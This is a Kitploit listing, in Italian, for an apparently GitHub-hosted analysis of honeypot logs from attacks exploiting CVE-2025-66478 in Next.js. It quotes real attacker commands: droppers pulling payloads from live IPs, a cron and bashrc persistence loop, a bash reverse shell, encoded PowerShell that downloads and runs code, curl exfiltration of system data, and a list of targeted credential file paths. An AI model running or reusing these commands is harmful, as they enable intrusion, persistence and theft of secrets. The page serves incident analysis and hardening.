Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-66478 — Analisi di log di attacco reali relativi a CVE-2025-66478 (Next.js Server Actions RCE) con campioni di malware, tracciamento dell'IP dell'attaccante e lezioni di hardening della sicurezza dei container. | Kitploit
Strumenti/GitHubGitHub/exptechtw/cve-2025-66478
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebInformatica ForenseAnalisi MalwareThreat IntelligenceApprendimento e FormazioneRisposta agli Incidenti
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Analisi di log di attacco reali relativi a CVE-2025-66478 (Next.js Server Actions RCE) con campioni di malware, tracciamento dell'IP dell'attaccante e lezioni di hardening della sicurezza dei container.

259 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-66478 - Analisi dei Log di Attacchi Reali per la RCE delle Server Actions di Next.js

Panoramica

Questo progetto raccoglie log di attacchi reali registrati da un'applicazione Next.js 15.1.2 esposta su Internet (eseguita in un contenitore Docker). Questi log mostrano lo scanning e lo sfruttamento massiccio della vulnerabilità CVE-2025-66478 da parte di strumenti di attacco automatizzati.

Intervallo di registrazione: 2025-12-04 ~ 2025-12-06 (circa 48 ore)

Informazioni sull'ambiente:

  • Framework: Next.js 15.1.2
  • Ambiente di esecuzione: Bun v1.2.20
  • Contenitore: Docker (Alpine Linux)
  • Fuso orario: Asia/Taipei

Statistiche per tipo di attacco

1. Download ed esecuzione di malware (Dropper/Downloader)

Gli aggressori hanno tentato di eseguire comandi per scaricare ed eseguire malware sfruttando la vulnerabilità.

IP di origineURL del payload malevoloDescrizione
216.158.232.43http://216.158.232.43:12000/sex.shBotnet/crypto-miner
38.207.161.212http://38.207.161.212/agentProgramma agente malevolo
43.156.63.124http://43.156.63.124/tsdBackdoor tramite cron
154.38.121.219res.qiqigece.top/nginx3Malware camuffato da nginx
47.79.42.91iot.632313373.xyz/nz.shScript per botnet IoT
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shCrypto-miner/backdoor
103.135.101.15http://103.135.101.15/wocaosinm.shScript malevolo
38.12.24.231http://38.12.24.231/kworkerMalware camuffato da kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shScript di inizializzazione

Esempio di comando di attacco

root@kitploit:~
# Attacco dropper tipico
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Backdoor persistente tramite cron
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Attacco persistente complesso (tenta più metodi di download + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Reverse Shell

Gli aggressori hanno tentato di stabilire connessioni reverse shell per ottenere accesso interattivo.

root@kitploit:~
# Reverse shell in Bash
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. Attacchi PowerShell (erroneamente indirizzati a Windows)

Gli aggressori presumevano che il target fosse un sistema Windows e hanno tentato di eseguire comandi PowerShell.

root@kitploit:~
# PowerShell malevolo codificato in Base64
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Decodificato:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Calcoli matematici per la verifica della vulnerabilità
powershell -c "41*271"      # = 11111 (codice di conferma)
powershell -c "44225*41002" # = 1814113450

4. Raccolta di informazioni

Gli aggressori hanno tentato di raccogliere informazioni di sistema per attacchi successivi.

root@kitploit:~
# Raccolta e invio di informazioni di sistema
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Furto di credenziali

Gli aggressori hanno tentato di leggere vari file sensibili e credenziali.

Percorsi sensibili tentati

6. Esposizione di variabili d'ambiente

Variabili d'ambiente del contenitore esposte con successo tramite la vulnerabilità:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. Esfiltrazione DNS

Gli aggressori hanno utilizzato query DNS per l'esfiltrazione di dati o la conferma della vulnerabilità:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

Motivi del fallimento degli attacchi

La maggior parte degli attacchi è fallita a causa della natura leggera del contenitore Alpine Linux:

Strumento mancanteImpatto
curlImpossibile scaricare payload malevoli
bashImpossibile eseguire sintassi specifica di bash (es. reverse shell)

Sebbene wget fosse disponibile, alcuni script malevoli dipendevano internamente da curl o bash, causando il fallimento dell'esecuzione.


Esempi di decodifica Base64

I log contengono molti dati codificati in Base64. Di seguito alcuni risultati di decodifica:

Esposizione di informazioni di sistema

root@kitploit:~
# digest: 'cm9vdAo='
Decodificato: root

# digest: 'dGVzdAo='
Decodificato: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Decodificato: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Decodificato: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Esposizione di elenchi di directory

root@kitploit:~
# Contenuto della directory /tmp
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Decodificato:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Statistiche sugli IP di origine degli attacchi

Di seguito gli indirizzi IP di origine degli attacchi registrati:


Tecniche di sfruttamento della vulnerabilità (Attack Vectors)

Chiamata a Server Action

Gli aggressori hanno tentato di chiamare Server Action inesistenti:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

Esposizione di informazioni nelle risposte di errore

Gli aggressori hanno sfruttato il campo digest nei messaggi di errore per esfiltrare dati:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // 'root' codificato in Base64

Punti chiave didattici

1. Buone pratiche per la sicurezza dei container

  • Immagini minimali: l'uso di immagini di base leggere (es. Alpine) riduce la superficie d'attacco
  • Rimuovere strumenti non essenziali: non installare curl, bash, python e altri strumenti che potrebbero essere abusati
  • File system in sola lettura: eseguire i container con --read-only
  • Utente non root: eseguire l'applicazione con un utente non privilegiato

2. Mitigazione della vulnerabilità

  • Aggiornare Next.js alla versione corretta
  • Validare l'input delle Server Action
  • Implementare regole WAF per filtrare richieste sospette

3. Monitoraggio e rilevamento

  • Monitorare l'esecuzione anomala di processi figli
  • Monitorare le connessioni di rete in uscita
  • Monitorare i tentativi di accesso a file sensibili

Disclaimer

Questo progetto ha esclusivamente finalità educative e di ricerca sulla sicurezza informatica. Tutti gli attacchi registrati sono tentativi reali diretti a un honeypot di ricerca. Non utilizzare queste informazioni per scopi illegali.


Campioni di malware

Questo progetto include campioni di malware reali estratti e scaricati dai log di attacco. Per un'analisi dettagliata, consultare:

malware_samples/ANALYSIS.md

Campioni ottenuti

Riepilogo delle tecniche di attacco

  1. nz.sh - Installa l'agente di monitoraggio Nezha per il controllo remoto dell'host vittima
  2. tsd.sh + tsd - Stabilisce molteplici meccanismi di persistenza (cron + systemd + rc.local)
  3. init.sh + agent - Framework backdoor completo, supporta multi-sistema, riavvio automatico e registrazione dei log

Risorse correlate

  • Avvisi di sicurezza di Next.js
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

Licenza

Licenza MIT

Scarica lo strumento
CategoriaPercorso
Credenziali cloud/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
Chiavi SSH/root/.ssh/id_rsa, /root/.ssh/config
Credenziali Git/root/.git-credentials, /root/.gitconfig
Container/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Applicazioni/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Storico shell/root/.bash_history, /root/.zsh_history
Strumenti cloud/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Impostazioni di sistema/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
powershellAttacchi Windows inefficaci
pythonImpossibile usare downloader Python
Indirizzo IPPaese/Regione (presunto)Tipo di attacco
216.158.232.43Stati UnitiDropper
38.165.44.205Stati UnitiDropper
23.95.44.80Stati UnitiDropper
154.38.121.219Hong KongMalware (nginx3)
38.207.161.212Stati UnitiAgent
43.156.63.124CinaBackdoor cron
47.79.42.91Cina (Alibaba Cloud)Botnet IoT
47.79.65.237Cina (Alibaba Cloud)Crypto-miner
119.45.243.154Cina (Tencent Cloud)Crypto-miner
144.22.210.54BrasileDropper
217.60.249.228SveziaDropper
154.26.192.32Stati UnitiReverse Shell
156.234.209.103SconosciutoPayload PowerShell
38.60.212.106Stati UnitiRaccolta informazioni
103.135.101.15VietnamBotnet
128.199.194.97Singapore (DigitalOcean)Script di setup
38.12.24.231Stati UnitiMalware persistente
FileTipoDimensioneFonteLivello di minaccia
nz.shShell Script931 Biot.632313373.xyzMedio
tsd.shShell Script1.7 KB43.156.63.124Alto
tsdELF 64-bit6.8 MB43.156.63.124Alto
init.shShell Script6.1 KBAWS S3Critico
agentELF 64-bit23.7 MBAWS S3Critico
Agtisx.exePE32+ (Windows)24.0 MBAWS S3Critico